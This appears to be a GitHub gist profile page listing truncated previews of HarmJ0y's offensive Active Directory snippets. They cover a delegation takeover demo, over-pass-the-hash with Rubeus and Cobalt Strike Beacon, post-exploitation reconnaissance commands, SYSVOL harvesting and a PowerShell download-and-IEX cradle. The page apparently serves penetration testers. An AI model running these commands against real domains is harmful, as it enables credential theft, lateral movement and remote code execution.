Skip to content

Instantly share code, notes, and snippets.

geeking out about Kerberos

Will HarmJ0y

geeking out about Kerberos
View GitHub Profile
HarmJ0y / Jenkinsfile
Created Nov 2, 2020
Rubeus Jenkinsfile
View Jenkinsfile
@Library('ci-jenkins-common') _
// Jenkins build pipeline (declarative)
// Project: Seatbelt
// URL:
// Author: @tifkin_/@harmj0y
// Pipeline Author: harmj0y
def gitURL = ""
HarmJ0y / rbcd_demo.ps1
Last active Jul 13, 2021
Resource-based constrained delegation computer DACL takeover demo
View rbcd_demo.ps1
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
HarmJ0y / gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active Apr 8, 2021
Over-pass-the-hash with Rubeus and Beacon
View gist:dc379107cfb4aa7ef5c3ecbac0133a02
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
HarmJ0y / cobaltstrike_sa.txt
Created Sep 28, 2018
Cobalt Strike Situational Awareness Commands
View cobaltstrike_sa.txt
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
HarmJ0y / New-SYSVOLZip.ps1
Created Aug 8, 2017
Compresses all of SYSVOL to a local .zip file.
View New-SYSVOLZip.ps1
function New-SYSVOLZip {
Compresses all folders/files in SYSVOL to a .zip file.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
View DPAPI.ps1
Add-Type -AssemblyName System.Security
$Content = (New-Object Net.Webclient).DownloadString('')
$Bytes = ([Text.Encoding]::ASCII).GetBytes($Content)
$EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)
IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)))
HarmJ0y / PowerView-3.0-tricks.ps1
Last active Jul 22, 2021
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
View Get-NonstandardService.ps1
function Get-NonstandardService {
Returns services where the associated binaries are either not signed, or are
signed by an issuer not matching 'Microsoft'.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
View powershell_talks.txt
BSides LV 2015 - "Building an Empire with PowerShell" -
BSides DC 2015 - "Bridging the Gap: Lessons in Adversarial Tradecraft" -
BSides DC 2015 - "** It, Do it Live (PowerShell Digital Forensics)" -
PowerShell Summit 2016 - "Digital Forensics with PowerShell" -
BSides LV 2016 - "Building an EmPyre with Python" -
DerbyCon 2016 - "A Year in the Empire" -
HarmJ0y / ConvertFrom-UserParameter.ps1
Last active Jan 22, 2021
View ConvertFrom-UserParameter.ps1
function ConvertFrom-UserParameter {
Converts a userparameters encoded blob into an ordered dictionary of decoded values.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None